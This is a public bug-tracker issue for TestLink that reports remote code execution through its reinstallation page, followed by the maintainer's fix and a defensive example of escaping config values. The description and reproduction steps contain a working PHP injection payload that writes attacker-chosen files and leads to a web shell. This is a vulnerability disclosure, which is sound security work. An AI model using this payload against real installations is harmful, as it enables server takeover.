Mantis Bugtracker 

ID: 0008209
Project: TestLink
Category: Security - General
View Status: public
Date Submitted: 2018-02-23 05:47
Last Update: 2018-04-14 09:04
Reporter: Manish Tanwar
Assigned To: fman
Platform, OS, OS Version: (blank)
Product Version: 1.9.16 (2016 Q4)
Fixed in Version: 1.9.17 (2018 Q1)
Summary: 0008209: Remote Code Execution

Description:
During a code audit (versions 1.9.14 and 1.9.17) I came to know about a Remote Code Execution security issue.
This issue is on the script installation page (install/installNewDB.php).
Once script installation has been done, a user can again perform re-installation by navigating to the "/install/" directory. The script will ask for MySQL credentials, and if the user provides credentials of a MySQL server which is attacker-controlled and listening for remote connections, the attacker just needs to specify the remote MySQL server IP and the root user's username and password, and needs to specify the PHP code "box');file_put_contents($_GET[1],file_get_contents($_GET[2]));//" in the "TestLink DB login" field (or in the HTTP POST parameter tl_loginname).
Once the script establishes a successful connection to the root user account of the remote MySQL server, it will create a MySQL user with the name "box');file_put_contents($_GET[1],file_get_contents($_GET[2]));//" and will write this user name in a file.
After that the attacker just needs to access the config file with the following GET method HTTP parameters:
testlink/
It will dump a PHP web shell in the base directory with the name shell.php.

Steps To Reproduce:
-> Navigate to the "/install" directory.
-> Follow the instructions on the installation page until we get the web page in which we have to specify the MySQL server credentials.
-> Specify the remote MySQL server IP, root user account username and password in the Database Host, Database admin login and password fields respectively.
-> Specify the below-mentioned PHP code in the "Testlink db login" input field and any password in the "TestLink DB password" input field.
-> Click the "Process Testlink Setup" button and observe the response.
-> Open the "" file in a text editor and observe that the file contains "define('DB_USER', 'box');file_put_contents($_GET[1],file_get_contents($_GET[2]));//');" which is PHP code injection.
Tags: No tags attached.
Database (MySQL,Postgres,etc): MySQL
PHP Version: (blank)
QA Team - Task Workflow Status: READY FOR TESTING
Attached Files: testlink POC.png (171,492 bytes) 2018-02-23 05:47
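
The report above describes an installer field being pasted between quotes in a generated PHP config line. As an added example (not TestLink's code or its actual fix; the function names, the allow-list and the sample inputs are assumptions constructed here), the unsafe pattern is shown beside an escaped writer and an input check, with PHP's tokenizer used to count how many statements each generated line contains:

```php
<?php
// Added example, not TestLink code; function names are hypothetical.

// Unsafe pattern: the value is pasted between quotes in generated PHP source,
// so a single quote in the input ends the string literal early.
function render_define_unsafe(string $name, string $value): string
{
    return "define('" . $name . "', '" . $value . "');\n";
}

// Hardened writer: var_export() emits a correctly escaped PHP string literal.
function render_define_safe(string $name, string $value): string
{
    return 'define(' . var_export($name, true) . ', '
        . var_export($value, true) . ");\n";
}

// Input check before anything is written (the allow-list is an assumption).
function is_valid_db_login(string $login): bool
{
    return preg_match('/\A[A-Za-z0-9_]{1,32}\z/', $login) === 1;
}

// Count statement terminators with PHP's own tokenizer; a ';' inside a
// string literal or a comment is not a separate token.
function count_statements(string $phpBody): int
{
    $count = 0;
    foreach (token_get_all("<?php\n" . $phpBody) as $token) {
        if ($token === ';') {
            $count++;
        }
    }
    return $count;
}

// Constructed sample inputs: one ordinary login, one that contains a quote.
$samples = ['testlink_user', "box');echo 1;//"];
foreach ($samples as $login) {
    printf(
        "%-20s valid=%s unsafe_statements=%d safe_statements=%d\n",
        $login,
        is_valid_db_login($login) ? 'yes' : 'no',
        count_statements(render_define_unsafe('DB_USER', $login)),
        count_statements(render_define_safe('DB_USER', $login))
    );
}
```

A generated `define()` line that tokenizes to more than one statement means the input escaped its string literal; the escaped writer keeps every input to exactly one statement, and the allow-list rejects the quoted input before anything is written.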

- Relationships

-  Notes
fman (administrator)
2018-02-24 09:31

Thanks, going to check
fman (administrator)
2018-02-24 16:22

Please get the latest code from GitHub, retest and provide feedback.
fman (administrator)
2018-02-24 16:24 [^]
Manish Tanwar (reporter)
2018-02-24 17:58


I have checked the patch applied; it seems fixed.
In case I get any bypass, I will register an issue ticket.

I want to know how to get a CVE ID for this security issue. If you can help me, please let me know.
Happy and Safe Coding.

Thank You
fman (administrator)
2018-02-24 18:01

Cannot help with CVE, never done.
Manish Tanwar (reporter)
2018-02-24 18:02

That's fine, I will check with someone else :)
So are you going to mention my name in the next release for the security bug fix?
fman (administrator)
2018-04-14 09:04

release 1.9.17

- Issue History
Date Modified Username Field Change
2018-02-23 05:47 Manish Tanwar New Issue
2018-02-23 05:47 Manish Tanwar File Added: testlink POC.png
2018-02-24 09:31 fman Note Added: 0027229
2018-02-24 16:22 fman Note Added: 0027235
2018-02-24 16:24 fman QA Team - Task Workflow Status => READY FOR TESTING
2018-02-24 16:24 fman Note Added: 0027236
2018-02-24 16:24 fman Status new => resolved
2018-02-24 16:24 fman Fixed in Version => 1.9.17 (2018 Q1)
2018-02-24 16:24 fman Resolution open => fixed
2018-02-24 16:24 fman Assigned To => fman
2018-02-24 17:58 Manish Tanwar Note Added: 0027240
2018-02-24 18:01 fman Note Added: 0027241
2018-02-24 18:01 Manish Tanwar Note View State: 0027240: private
2018-02-24 18:02 Manish Tanwar Note Added: 0027242
2018-02-24 18:03 Manish Tanwar Note View State: 0027242: private
2018-02-24 18:40 Manish Tanwar Note View State: 0027240: public
2018-02-24 18:40 Manish Tanwar Note View State: 0027242: public
2018-02-25 13:42 fman View Status private => public
2018-04-14 09:04 fman Note Added: 0027295
2018-04-14 09:04 fman Status resolved => closed
